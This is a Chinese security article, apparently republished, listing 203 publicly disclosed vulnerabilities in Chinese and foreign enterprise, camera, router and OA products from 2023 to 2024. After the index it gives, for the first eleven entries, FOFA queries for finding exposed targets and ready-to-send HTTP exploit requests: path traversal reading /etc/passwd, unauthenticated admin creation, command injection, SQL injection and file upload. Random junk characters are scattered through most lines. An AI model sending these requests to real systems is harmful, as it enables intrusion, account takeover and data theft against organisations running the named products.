互联网公开漏洞整理202309-202406
5 V) ?( S' ]$ F, L7 q8 U' i. Q道一安全 2024-06-05 07:41 北京
6 g- M& ?, q1 n以下文章来源于网络安全新视界 ,作者网络安全新视界( c: I5 b$ [0 l Y9 v/ c$ V5 @# \
: o! b2 G! [' A' Z: ]0 s4 r发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
j$ e3 M+ [; Q2 o- @- a9 E( U$ g5 Z3 j9 [% g! @
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
+ o0 J3 V" ~; C
+ ]3 h# k& j! T0 h. u7 w安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
! Z' {3 A# \* D$ p- o# p# ?
3 A5 _0 j, J/ T2 B) l) S z文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
& v7 `1 {: { F- m
$ ~* M; H5 z3 _: d: {4 o6 o合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
: N4 o$ l: d3 L. H* B* u* V5 A% u! L" S2 | J9 @. }
2 F8 e ~' [/ O. o
声明* }4 |3 A% L" `
. u* Z/ D; ?1 S! m" ]) J
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
7 X2 J, Y6 e" e7 d: L
- U; t. W, n/ G& R& \/ Y9 m有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。6 t6 }2 a$ K7 U/ B# G, J
, g# l7 @" U; [9 B
# F1 ^* A7 t+ p. l2 q- w% y% Q
X7 N0 P# A s' H3 s9 B
目录3 w1 _: u$ U# J: P" }
/ `; p |& f1 L; ~% Q
013 m; u! B. ?; r+ v! ^
9 d; I) Q+ s$ h% Q1 u3 V
1. StarRocks MPP数据库未授权访问
! }7 B! a# ^+ i/ P# p7 K7 U2. Casdoor系统static任意文件读取
* v1 g4 m5 B i5 i. T3. EasyCVR智能边缘网关 userlist 信息泄漏 {$ u; Q" K. b3 P) [! E* t
4. EasyCVR视频管理平台存在任意用户添加
, V' H. Z( r- H5. NUUO NVR 视频存储管理设备远程命令执行
i U- M4 L8 X% l6. 深信服 NGAF 任意文件读取/ Z* Q: T0 b. o& C' [
7. 鸿运主动安全监控云平台任意文件下载* d K. J9 G& i
8. 斐讯 Phicomm 路由器RCE6 W7 n P; I. `) g5 J7 Y2 S
9. 稻壳CMS keyword 未授权SQL注入
( J* o9 x# d- }6 n/ m10. 蓝凌EIS智慧协同平台api.aspx任意文件上传1 O1 ~( ]3 y% ~
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入$ c) O% g4 y8 {$ @/ H- I* Y
12. Jorani < 1.0.2 远程命令执行
0 P+ [7 D5 [6 O13. 红帆iOffice ioFileDown任意文件读取 w6 F* C1 \5 J. }! l
14. 华夏ERP(jshERP)敏感信息泄露
6 m8 q9 b8 U- s# w! F15. 华夏ERP getAllList信息泄露
+ C8 \# j9 ^! i' \16. 红帆HFOffice医微云SQL注入
+ V4 ~" P- \' p2 p* z2 [0 t. s8 Z17. 大华 DSS itcBulletin SQL 注入
8 H0 Q/ Z. v! x/ l' v" J$ X2 F18. 大华 DSS 数字监控系统 user_edit.action 信息泄露6 E5 O9 m- p4 F/ d. k
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入/ s/ o0 |9 y _' q# b5 W% c
20. 大华ICC智能物联综合管理平台任意文件读取, m- N" c5 c0 C9 |) s( W$ {3 x. T
21. 大华ICC智能物联综合管理平台random远程代码执行5 v) P2 ]. A5 e* `
22. 大华ICC智能物联综合管理平台 log4j远程代码执行: K4 ?' F& V3 g x3 ~* v( O8 e3 l
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行: m6 S. \& Y9 Y9 f
24. 用友NC 6.5 accept.jsp任意文件上传
* f9 w: E7 h3 L, Y6 R25. 用友NC registerServlet JNDI 远程代码执行. m9 U+ e. o8 g, B' u9 k3 N" D
26. 用友NC linkVoucher SQL注入1 n) n# q- k: B& ]- J
27. 用友 NC showcontent SQL注入( o# z8 Q Y# l1 }0 B! _$ {
28. 用友NC grouptemplet 任意文件上传! L4 _% l. L7 V! v' S' l" F; F3 s* b
29. 用友NC down/bill SQL注入
6 j2 l8 ]5 q5 Y30. 用友NC importPml SQL注入
9 ]1 T$ `% x4 s' I, c. Z: S1 Z31. 用友NC runStateServlet SQL注入
9 O! K) A9 i: h32. 用友NC complainbilldetail SQL注入
' C( P/ g' G4 H! Q33. 用友NC downTax/download SQL注入
8 e. A4 ^' {1 H. M" J% b, V# O5 B34. 用友NC warningDetailInfo接口SQL注入
6 y3 h2 i- p' G* n35. 用友NC-Cloud importhttpscer任意文件上传/ d1 n. e$ g: Q3 @( R
36. 用友NC-Cloud soapFormat XXE, F- {1 ?; I* ~) S7 \
37. 用友NC-Cloud IUpdateService XXE
: A! Q) V1 g6 q38. 用友U8 Cloud smartweb2.RPC.d XXE4 C* n- M( C( m' q
39. 用友U8 Cloud RegisterServlet SQL注入
$ }* f8 S5 p/ M% ]! _ y( n! K' v3 y40. 用友U8-Cloud XChangeServlet XXE
1 {* Q' g- K/ m+ ?7 K3 r41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
3 t+ j" m) x; G' {5 i7 u" V s42. 用友GRP-U8 SmartUpload01 文件上传4 Y+ N) I) m' \/ H
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
8 f0 h, d5 M2 _' p. w$ h44. 用友GRP-U8 bx_dj_check.jsp SQL注入
$ }5 v& W6 W7 q3 Z- t4 _! m45. 用友GRP-U8 ufgovbank XXE+ c4 f" @ X, L! @, f
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
9 W# k/ _( f! h2 E' z" W47. 用友GRP A++Cloud 政府财务云 任意文件读取; o3 A! I2 i& r% ~; G* a/ v
48. 用友U8 CRM swfupload 任意文件上传
X- \8 ` I8 Y! b0 l+ {4 {49. 用友U8 CRM系统uploadfile.php接口任意文件上传* \; s. E7 b) G) U# x
50. QDocs Smart School 6.4.1 filterRecords SQL注入& W& D; Z1 c: o- r, V
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
$ v0 U5 n5 V* u52. 泛微E-Office json_common.php sql注入3 L1 I0 L5 i6 m, r J ]- u# M
53. 迪普 DPTech VPN Service 任意文件上传
' {7 ~: P+ x X) v p' K% Z54. 畅捷通T+ getstorewarehousebystore 远程代码执行
" C! l2 ?$ l# }1 {55. 畅捷通T+ getdecallusers信息泄露! R/ {6 Q5 ]* O. ?
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE; j, P3 U3 k8 \5 t" Z+ _
57. 畅捷通T+ keyEdit.aspx SQL注入
8 \! v# o( g3 g6 ~% d6 v* h. y58. 畅捷通T+ KeyInfoList.aspx sql注入- x/ b ^& h; u
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
, ]! L" L+ ]* n3 t60. 百卓Smart管理平台 importexport.php SQL注入7 u2 v" n. J3 s% a
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传4 ]$ G" D, I/ r. c; g: X/ y' n
62. IP-guard WebServer 远程命令执行
! S- _+ }7 r- L C63. IP-guard WebServer任意文件读取
3 @' f. j: T; H64. 捷诚管理信息系统CWSFinanceCommon SQL注入
3 C5 g* E" Q# f/ }65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
" y) a* f& k2 M: j4 i" p4 N3 f66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
3 w( f3 X3 d6 b# v7 W67. 万户ezOFFICE wpsservlet任意文件上传" S6 l4 a, C) Z, _% M
68. 万户ezOFFICE wf_printnum.jsp SQL注入4 s4 J, W( m+ |/ |! n" y
69. 万户 ezOFFICE contract_gd.jsp SQL注入
. a. l3 ?* x% w. Q9 e+ z9 X! ~7 i70. 万户ezEIP success 命令执行/ i; h: W g3 i* J9 `
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
. X% w5 _4 u2 }. w+ q& n3 T. N. F72. 致远OA getAjaxDataServlet XXE
9 m0 T. ]/ B, I3 { R) W73. GeoServer wms远程代码执行( X0 p! u1 U' H# ]2 W- j" K
74. 致远M3-server 6_1sp1 反序列化RCE
0 y: `8 {. _* n5 X/ a75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
& t6 q9 `) x: K! x& L76. 新开普掌上校园服务管理平台service.action远程命令执行: ], |1 q6 a/ @- J3 ^. p" Y
77. F22服装管理软件系统UploadHandler.ashx任意文件上传- R( B: R4 y3 {
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
. `1 l( B: B7 g79. BYTEVALUE 百为流控路由器远程命令执行
& ^3 _$ O$ g3 D- Q$ l/ L6 f" U80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
# V* t4 W; p: M9 _. ~2 L9 g81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
u$ Z5 k3 w' l% C+ T0 _; w1 a6 o82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行! W E) p2 g9 M; @0 u! k
83. JeecgBoot testConnection 远程命令执行. k# F4 M- B1 T/ d# e# ~# E/ s1 Q0 g: x
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入2 {0 C4 Z1 R0 E" B6 K
85. SysAid On-premise< 23.3.36远程代码执行. g) y3 G* {/ v1 \* _
86. 日本tosei自助洗衣机RCE( B/ N: _3 o w3 D' }
87. 安恒明御安全网关aaa_local_web_preview文件上传% t' v! N( W/ c+ ~; \$ r
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
O9 Y$ Q; q9 D0 z& L' Y" b89. 致远互联FE协作办公平台editflow_manager存在sql注入
( @; [ j. `5 q# |* j90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
8 S' m9 K4 R$ z91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取. r$ I+ j1 D" Z2 K. F! _9 ^" U
92. 海康威视运行管理中心session命令执行/ T% O# g1 `/ i# g& O, |
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传$ @# s. T+ I1 c+ P. R1 y) S4 Y1 v0 i! K
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
7 Y- ~7 R6 z8 b/ Y+ }) T95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
" }6 u% e! Q/ S y2 |$ D96. Apache OFBiz 18.12.11 groovy 远程代码执行
& ~4 Q& c9 T3 [ B6 T/ c9 }97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
; z* s9 \; V; @. Z. x98. SpiderFlow爬虫平台远程命令执行0 Z" `. h0 E |2 j* B
99. Ncast盈可视高清智能录播系统busiFacade RCE
# \* D" Y0 D( {' y: ]- z+ L100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
! r0 R& N* n% H5 d6 M- S C+ g101. ivanti policy secure-22.6命令注入+ }8 _/ l- p# B G P0 p
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行3 b2 ~# u9 i0 [8 R
103. Ivanti Pulse Connect Secure VPN XXE
: q8 h% T' {& W- f) S2 ~! a104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露6 a( l, v# {/ k+ a$ y Y* {6 l
105. SpringBlade v3.2.0 export-user SQL 注入2 p+ J( Q! r, Y4 @% S2 E
106. SpringBlade dict-biz/list SQL 注入
8 |; Z/ I" E+ ]6 G107. SpringBlade tenant/list SQL 注入
1 z+ U5 ~8 w) x9 v4 u6 D8 d& ]108. D-Tale 3.9.0 SSRF, s! p1 ?* M% D
109. Jenkins CLI 任意文件读取
4 {/ m# |3 t6 l2 g9 r9 h110. Goanywhere MFT 未授权创建管理员
. Q9 q0 \3 e0 v& p" w111. WordPress Plugin HTML5 Video Player SQL注入
8 }/ @* e* E$ K% t5 x0 y6 [0 n4 Q112. WordPress Plugin NotificationX SQL 注入0 `% X( A( }5 H
113. WordPress Automatic 插件任意文件下载和SSRF
! L" o: I/ m; x, S# \114. WordPress MasterStudy LMS插件 SQL注入9 Y. c0 w: }! O' F6 C4 C
115. WordPress Bricks Builder <= 1.9.6 RCE/ t* \1 |# s# Y0 d* \' Y( Q
116. wordpress js-support-ticket文件上传
* G9 s& I* E( m( I* a117. WordPress LayerSlider插件SQL注入
* v2 x0 w: e! [5 r$ w$ H118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
~ M; @; Y2 z6 f" b+ r( [119. 北京百绰智能S20后台sysmanageajax.php sql注入$ _# T$ k( B, c( b" a
120. 北京百绰智能S40管理平台导入web.php任意文件上传4 S6 N: |& `6 G
121. 北京百绰智能S42管理平台userattestation.php任意文件上传! n, @; Q3 a8 L* `% m( ?
122. 北京百绰智能s200管理平台/importexport.php sql注入1 W) R' L: Z. v) U+ V9 @) V1 D, e$ c
123. Atlassian Confluence 模板注入代码执行
0 x, X2 {1 h8 j8 m124. 湖南建研工程质量检测系统任意文件上传; c! s6 c# o5 o+ [2 N
125. ConnectWise ScreenConnect身份验证绕过; `7 d8 w/ u$ }, y( a
126. Aiohttp 路径遍历+ O# C% ?- Y; o2 _/ l' Y) [
127. 广联达Linkworks DataExchange.ashx XXE }! D- O# ]- x* Z$ I0 p
128. Adobe ColdFusion 反序列化
! C9 S U& F& N+ s129. Adobe ColdFusion 任意文件读取$ }; H3 L ?2 a6 ^. @, U, g" S, m
130. Laykefu客服系统任意文件上传5 q8 L) u0 }$ u; c
131. Mini-Tmall <=20231017 SQL注入
$ j3 @" ^8 o o/ B/ S132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过/ b3 I$ K9 |0 O0 s
133. H5 云商城 file.php 文件上传, f/ P9 ?3 _/ g( o
134. 网康NS-ASG应用安全网关index.php sql注入9 ?; b! h4 m4 A/ I
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
. u- \ N/ a2 D) M5 n" @' a136. NextChat cors SSRF
; u" v0 l; }3 W( g- E1 K137. 福建科立迅通信指挥调度平台down_file.php sql注入4 T+ C+ _( L/ C0 g
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入# I4 N8 ^. J" U+ }" f5 k$ X# T; A
139. 福建科立讯通信指挥调度平台editemedia.php sql注入4 G7 ^ P' [0 G! ?
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
$ v) E4 c1 C4 P V( g, n8 L; Z% C! m141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入8 B5 k9 z- g9 v
142. CMSV6车辆监控平台系统中存在弱密码
7 ~! N9 j9 W6 B143. Netis WF2780 v2.1.40144 远程命令执行
, t/ {% l1 z+ `144. D-Link nas_sharing.cgi 命令注入5 H- K+ c! k% s5 i
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入! b2 P% B: u/ e7 D! N! s$ |! ]& A
146. MajorDoMo thumb.php 未授权远程代码执行/ x" A7 t$ ~0 Q
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历. R6 ^! t' }! K( l
148. CrushFTP 认证绕过模板注入( Q, ~* p: K( T' N: [
149. AJ-Report开源数据大屏存在远程命令执行' s0 t# ~& W5 f. m: G( {; h
150. AJ-Report 1.4.0 认证绕过与远程代码执行' P- J) V7 \4 K4 E z
151. AJ-Report 1.4.1 pageList sql注入0 I, P( z4 N* _- Z/ G3 u
152. Progress Kemp LoadMaster 远程命令执行
- F! ~/ | a& G& B7 i( ~153. gradio任意文件读取
" n$ C7 ^+ s) l154. 天维尔消防救援作战调度平台 SQL注入
& G% i; N) ] U: C9 x+ t0 P* p' R155. 六零导航页 file.php 任意文件上传% N: g. S) x0 Q1 ]. _
156. TBK DVR-4104/DVR-4216 操作系统命令注入
* y5 h# Z/ h9 f5 }* }" x157. 美特CRM upload.jsp 任意文件上传- m' v& q2 d# i3 H: ?) {" V
158. Mura-CMS-processAsyncObject存在SQL注入* {+ B; ^. V4 _3 K- I/ A. y0 m# b
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
$ W. n8 P l+ o* [7 R ~8 y* L160. Sonatype Nexus Repository 3目录遍历与文件读取
2 b C0 |+ t* I4 b8 O% n4 i161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传( O& o7 y. E- p9 W( w9 g
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传; Y# ?; ]8 e9 \$ { |
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
/ B0 m. c4 j5 c/ Z( V164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
4 W. s3 D5 h# U" m165. OrangeHRM 3.3.3 SQL 注入: G4 I/ S; B6 D9 r' B. F2 r
166. 中成科信票务管理平台SeatMapHandler SQL注入
! o% c3 e( T& F/ N; R167. 精益价值管理系统 DownLoad.aspx任意文件读取( q; L8 M. H1 L V6 ^
168. 宏景EHR OutputCode 任意文件读取
; [2 K) D9 h7 ~169. 宏景EHR downlawbase SQL注入
7 C; G! s; A5 g0 B, T( h170. 宏景EHR DisplayExcelCustomReport 任意文件读取5 V6 D( D, w5 ~1 Z
171. 通天星CMSV6车载定位监控平台 SQL注入
: \1 ^. i# \/ E2 {) ^, l8 U4 q172. DT-高清车牌识别摄像机任意文件读取
$ w7 E, `' s) D6 q8 q+ }173. Check Point 安全网关任意文件读取
5 Y: {" n* n6 F4 h( x174. 金和OA C6 FileDownLoad.aspx 任意文件读取
' F! ]+ a+ I" @ @175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入' K; K2 d+ g+ C* P
176. 电信网关配置管理系统 rewrite.php 文件上传/ R. @" i1 y7 E: \: F2 p0 d! N' n
177. H3C路由器敏感信息泄露
) I" ?; c. S2 k$ a* s+ V178. H3C校园网自助服务系统-flexfileupload-任意文件上传0 p6 F* @/ _; n& k, j
179. 建文工程管理系统存在任意文件读取, V3 D" @/ k9 r0 F& r" r9 \; z
180. 帮管客 CRM jiliyu SQL注入
0 C8 `+ X7 _- M8 ?/ l181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入0 }% n. @; q0 h/ g
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建3 Z4 L: p6 R* q `
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入) ?9 r2 t9 m/ f) ?9 D; H1 m
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
6 Q' z) s! i. ~. c, H' {. h* ~185. 瑞友天翼应用虚拟化系统SQL注入. _6 ^3 E |( }/ `- | A# O' f
186. F-logic DataCube3 SQL注入
, _- a1 I) R8 j9 _187. Mura CMS processAsyncObject SQL注入
8 K" l; V3 G" I r188. 叁体-佳会视频会议 attachment 任意文件读取) t d' @! i9 l2 w3 W6 N& C
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
5 s1 m5 t2 a. }: X2 y% N' ~190. 短视频矩阵营销系统 poihuoqu 任意文件读取0 O8 L8 O" E* I+ R1 r
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
# U3 Z( ~: s# |6 ~ C192. 富通天下外贸ERP UploadEmailAttr 任意文件上传, t& n, e( H: Q& F4 N7 b2 }
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
4 {+ v! e3 x+ Y194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
x: C: }4 _% n7 ~5 G8 X3 ?195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
6 S9 W& h4 s3 q2 L$ t' a: S, [; U196. 河南省风速科技统一认证平台密码重置/ x l( C4 ~7 M+ Z8 m# }
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入- k* E% o( c" ~6 Z. r' F9 P
198. 阿里云盘 WebDAV 命令注入
% a( A, S: Q% A9 \- L199. cockpit系统assetsmanager_upload接口 文件上传! c, U* v* A" A3 q9 v$ M' t, V
200. SeaCMS海洋影视管理系统dmku SQL注入0 t: ?: X3 K: |# _) w- R/ T- }1 c
201. 方正全媒体新闻采编系统 binary SQL注入
# \, ]+ Y4 ]- ]& J, ^* c/ ?202. 微擎系统 AccountEdit任意文件上传
- H. T. G0 [. a. ^7 \ Z203. 红海云EHR PtFjk 文件上传
5 k- e% d) L2 C/ T. l
) b8 e) B9 o8 Z- aPOC列表3 O* j/ X* ?6 N" Y" l* J
* d; U, F& C! ]- I4 e+ Z5 W02; {; f, ~ k: R# H- E/ n- N
) e, C3 z/ Z, U/ ~: K' w1. StarRocks MPP数据库未授权访问
2 V/ P- s/ m% k/ u! ]3 k1 c: ?FOFA :title="StarRocks") ?9 p3 p1 D/ \( y4 u
GET /mem_tracker HTTP/1.1
$ c% v P- c- P, N3 ]( F2 zHost: URL' Z l) V) [1 B1 L0 D
7 U, D/ w0 p F* u0 B3 O) q& g3 R2 n% O
2. Casdoor系统static任意文件读取, G& Z' l. N7 J
FOFA :title="Casdoor"4 _" ~) t8 ~/ R- x
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
' k1 J- D M" @: cHost: xx.xx.xx.xx:9999
$ x' Y+ B0 T- M7 X, }9 n7 iUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% X! ~ D6 z6 y
Connection: close% @5 V5 M. P/ a+ k( P
Accept: */*0 ]) n; P& D V, E& [ |
Accept-Language: en, b. s/ [7 c4 W) }# W. q/ T
Accept-Encoding: gzip
. V8 F' L1 u/ X- |# t
+ |$ S! y6 N4 a0 }9 `+ \/ d2 U( g7 J1 v
3. EasyCVR智能边缘网关 userlist 信息泄漏8 ?& X- d% b8 t
FOFA :title="EasyCVR"
& v# B/ {1 X) V+ q6 r) ZGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1% u- Z4 p9 K6 v4 ?, |' ^" L. B
Host: xx.xx.xx.xx& C( q! q) [0 H' m
* }0 D, m8 x% _. n0 H- c+ ^ C
' m3 ^/ }6 N! b! K2 }
4. EasyCVR视频管理平台存在任意用户添加/ a8 k) ^4 l0 q4 S1 W- V5 ]* V+ y
FOFA :title="EasyCVR": F/ c% O8 Z* F+ s; f; r; m8 } \/ h
1 x+ `2 n2 O, @! a8 Spassword更改为自己的密码md5
. [* j* ^) Y+ [9 P( dPOST /api/v1/adduser HTTP/1.1
0 I6 f" V( I' D$ Q1 LHost: your-ip
) O& H: S. k2 b4 i3 G5 uContent-Type: application/x-www-form-urlencoded; charset=UTF-8/ J; J: e' ^% p
/ _% n. X& V: O4 X' _# Cname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
$ S8 U$ k2 R2 E/ j! O# m# g
& G" |" {6 e& j! u
4 B# p( V* _+ o- x( o5. NUUO NVR 视频存储管理设备远程命令执行
- H. ?; U/ ?. J# Q2 kFOFA:title="Network Video Recorder Login"
' D8 O" q' O3 u) UGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1* v5 y4 C0 m+ h: m9 N* A
Host: xx.xx.xx.xx
$ a& z; W5 |8 k- s/ R# f3 n
& E. f$ Y$ p( z: U9 e8 y4 \0 U( s3 N0 G6 q
6. 深信服 NGAF 任意文件读取/ f# u3 P3 I9 e
FOFA:title="SANGFOR | NGAF"
( `. P% W' }+ b6 ]3 ?( w, O! IGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1 f) I$ }& }7 x9 L( n+ _8 q
Host:
3 `) m. S" X- _6 R. Z. }
6 f$ f. L. {, ?* D, Y3 G$ F8 J. P! o* H# l6 x" ^" {- f* D7 U2 [# F' L: ] k
7. 鸿运主动安全监控云平台任意文件下载' x: y. C+ H1 E' z- g. z
FOFA:body="./open/webApi.html"
, c6 m% t( R; J3 G) s# n. K3 a( fGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
% r0 X/ B1 [1 @2 S4 v+ \3 kHost:+ `& K4 T- P9 }/ u3 j2 X
/ e# P o. o$ F
+ W; N+ G9 z6 L3 Z! i
8. 斐讯 Phicomm 路由器RCE4 d3 S$ L: |+ T
FOFA:icon_hash="-1344736688"
4 u. _6 S t9 N! i# Y) x, {默认账号admin登录后台后,执行操作
1 u; \ x! F5 p4 U" UPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1! C) a/ U4 m0 }3 a/ q
Host: x.x.x.x
; |7 X% h5 q% A$ r# U7 Q; J; ECookie: sysauth=第一步登录获取的cookie) |( I7 w* z1 f& C3 x& N* Y4 ?
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz: ~. E4 V1 `! R+ z! z& t! ^5 G* E* Z
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
9 k. |- E, b2 s% g
& o3 F0 \" R/ ~& s# J------WebKitFormBoundaryxbgjoytz1 Y7 T# p$ F* e
Content-Disposition: form-data; name="wifiRebootEnablestatus"3 o' K6 Z/ Y2 r+ R/ B
3 V5 t8 y, a" C0 J) B2 ]& d
%s
, I( b- T7 y5 X: z$ K7 _------WebKitFormBoundaryxbgjoytz# n* s% X' ?7 X$ u4 Q+ ~
Content-Disposition: form-data; name="wifiRebootrange"
2 E1 G5 _/ a) U: B) [; D; N+ u: s) `$ K& W1 q. L2 B
12:00; id;
: ]" j/ A$ u, y( l4 @# Z$ }; _------WebKitFormBoundaryxbgjoytz4 B/ G" t1 k6 N" h& o
Content-Disposition: form-data; name="wifiRebootendrange"
7 g' [+ [: m, U9 f- a Q
- W3 M2 x2 q$ h# K& v9 l%s:: m" N- L$ h9 |& U/ l+ V, X
------WebKitFormBoundaryxbgjoytz* @- x8 u% q# }: f" v) x- e) { O
Content-Disposition: form-data; name="cururl2"+ M+ h8 f9 U$ I
% \8 Q. H/ q! C6 d( X: M( d+ l4 i3 h' n( H' \- ?. v+ T
------WebKitFormBoundaryxbgjoytz--
8 x, d+ y, U4 g4 ]2 \: M/ E8 x- |
+ e4 ^" a" Z( p& F& j, K: G( z
9. 稻壳CMS keyword 未授权SQL注入+ E# D- E- |' ^+ p) A) R
FOFA:app="Doccms"# M0 U7 j( u3 Z& `$ B( O
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
- x# m# c& h8 k8 a* UHost: x.x.x.x- J3 D# U$ [. ?% n6 x2 G) y) `
, s% F5 O) A. g) `
" S0 Z% L+ @- W) `( z
payload为下列语句的二次Url编码
- }4 M' P- e) Y: y5 \: T* B& n( @
# I3 E( V- n& @/ s3 ]+ s' |' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#/ O3 l- i, `) ?6 \
% Z3 j- J( f) k* F+ X
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
+ x9 n+ b: ~7 J! j6 w; O/ u. jFOFA:icon_hash="953405444"
+ z8 q: H. \; Q/ p, }1 `4 P% U. U5 m4 ~7 e8 H/ N1 o: L0 {3 n. W
文件上传后响应中包含上传文件的路径% w: q4 h8 y* l+ X' {
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
$ M T" ^' {, \5 `9 c; _+ _, EHost: x.x.x.x:xx
! T/ H' o- x0 s: O$ Y) L" {) uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.360 K3 t; _6 K" |1 ^ l5 M
Content-Length: 1971 Z& w/ \& [1 A6 l4 `' G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
7 \& H3 `$ S" f9 y. uAccept-Encoding: gzip, deflate
! C' _* R: E' K8 ?Accept-Language: zh-CN,zh;q=0.9& J. R. G4 l0 C5 C
Connection: close! [/ F+ N5 S' I
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
1 \4 ~+ ~1 |) w2 _8 v
# F) x6 J6 s, [! Z------WebKitFormBoundaryxdgaqmqu, {: x: P T$ N
Content-Disposition: form-data; name="file"filename="icfitnya.txt" {9 q w3 f. o7 R. Z. m
Content-Type: text/html4 J+ L. n, k0 F7 S1 ?
3 r( o" W# S7 W. k/ M
jmnqjfdsupxgfidopeixbgsxbf
: o: U e7 T' d0 T6 t$ Q------WebKitFormBoundaryxdgaqmqu--; R' z. z' V1 L3 g! ?( b; M
; \/ ~8 K! K# [
" A% \. b w- f, P11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入5 b R3 L7 l* y& e( s5 {) }% p
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台") R& s) V8 S; G- k* p6 ?3 v3 U
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1% s8 \' V" T. @# o0 w
